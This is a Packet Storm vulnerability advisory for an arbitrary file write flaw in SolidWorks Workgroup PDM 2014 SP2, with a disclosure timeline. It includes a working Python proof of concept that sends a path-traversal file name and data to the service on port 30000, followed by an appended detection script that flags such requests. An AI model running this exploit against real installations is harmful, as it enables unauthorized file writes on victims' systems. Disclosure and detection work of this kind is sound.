SolidWorks Workgroup PDM 2014 SP2 Arbitrary File Write

2014-02-22T00:00:00
ID PACKETSTORM:125361
Type packetstorm
Reporter Mohamed Shetta
Modified 2014-02-22T00:00:00

Description

`'''  
# Title: SolidWorks Workgroup PDM 2014 SP2 Arbitrary File Write Vulnerability  
# Date: 2-21-2014  
# Author: Mohamed Shetta  
# Email: mshetta |at| live |dot| com  
# Vendor Homepage: http://www.solidworks.com/sw/products/product-data-management/workgroup-pdm.htm  
# Tested on: Windows 7  
# Vulnerability type: Arbitrary File Write  
# Vulnerable file: pdmwService.exe  
# Port: 30000  
  
  
---------------------------------------------------------------------------------------------------------  
Software Description:  
  
SolidWorks  
Workgroup PDM is a PDM tool that allows SolidWorks users operating in  
teams of 10 members or less to work on designs concurrently. With  
SolidWorks PDM Workgroup, designers can search, revise, and vault CAD  
data while maintaining an accurate design history.  
  
  
---------------------------------------------------------------------------------------------------------  
Vulnerability Details:  
  
This vulnerability allows remote attackers to write arbitrary files on vulnerable installations of SolidWorks Workgroup PDM.  
  
------------------------------------------------------------------------------------------------------------  
Disclosure timeline:  
  
12/15/2013 - Vendor notified and no response.  
2/21/2014 - Public disclosure  
'''  
  
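#!/usr/bin/env python
# Python 2 proof of concept (str objects are sent as raw bytes).
# Request layout sent to pdmwService.exe on TCP port 30000:
#   opcode (4 bytes) | file name length (uint32) | UTF-16LE file name |
#   file size (uint64, little-endian) | file contents

import socket
import struct

FileName="\x2E\x00\x2E\x00\x5C\x00\x2E\x00\x2E\x00\x5C\x00\x74\x00\x65\x00\x73\x00\x74\x00" #..\..\test (UTF-16LE)
Data="A"*1028
FileSize=len(Data)
FNsz=len(FileName)  # length in bytes, not characters
OpCode="\xD0\x07\x00\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.4", 30000))
s.send(OpCode)
s.send(struct.pack("<I", FNsz))  # explicit little-endian, same bytes as native "I" on x86
s.send(FileName)
s.send(struct.pack('<Q', FileSize))
s.send(Data)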
  
`
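A detection-side example, added here and not part of the original advisory: it parses a reassembled TCP payload in the layout the proof of concept sends and flags file names that would leave the intended directory. The layout is inferred from the proof of concept alone; the function names, the 1024-byte name cap and the benign sample file name are assumptions.

```python
import struct

OP_WRITE = 0x7D0      # opcode bytes D0 07 00 00, as sent by the PoC
MAX_NAME_BYTES = 1024  # assumed sanity cap, not a documented protocol limit

def parse_write_request(stream):
    """Return {'name', 'size'} for a request in the PoC's layout, else None."""
    if len(stream) < 8:
        return None
    opcode, name_len = struct.unpack_from("<II", stream, 0)
    if opcode != OP_WRITE or name_len % 2 or name_len > MAX_NAME_BYTES:
        return None
    if len(stream) < 8 + name_len + 8:   # name plus uint64 size must be present
        return None
    try:
        name = stream[8:8 + name_len].decode("utf-16-le")
    except UnicodeDecodeError:
        return None
    (size,) = struct.unpack_from("<Q", stream, 8 + name_len)
    return {"name": name, "size": size}

def traversal_reasons(name):
    """List the reasons a file name would leave the intended directory."""
    reasons = []
    parts = name.replace("/", "\\").split("\\")
    if any(p.strip() == ".." for p in parts):
        reasons.append("parent-directory component")
    if name.startswith(("\\", "/")):
        reasons.append("rooted or UNC path")
    if len(name) >= 2 and name[1] == ":":
        reasons.append("drive-qualified path")
    return reasons

def inspect(stream):
    """Parse a payload and attach traversal findings; None if not a match."""
    req = parse_write_request(stream)
    if req is not None:
        req["reasons"] = traversal_reasons(req["name"])
    return req

def _sample(name, data):
    """Constructed test payload in the layout above (never sent anywhere)."""
    enc = name.encode("utf-16-le")
    return (struct.pack("<II", OP_WRITE, len(enc)) + enc
            + struct.pack("<Q", len(data)) + data)

if __name__ == "__main__":
    for n in ("..\\..\\test", "bracket.sldprt"):  # second name is constructed
        print(inspect(_sample(n, b"A" * 1028)))
```

The same checks apply server-side: a file name received from the network should be rejected when `traversal_reasons` returns anything.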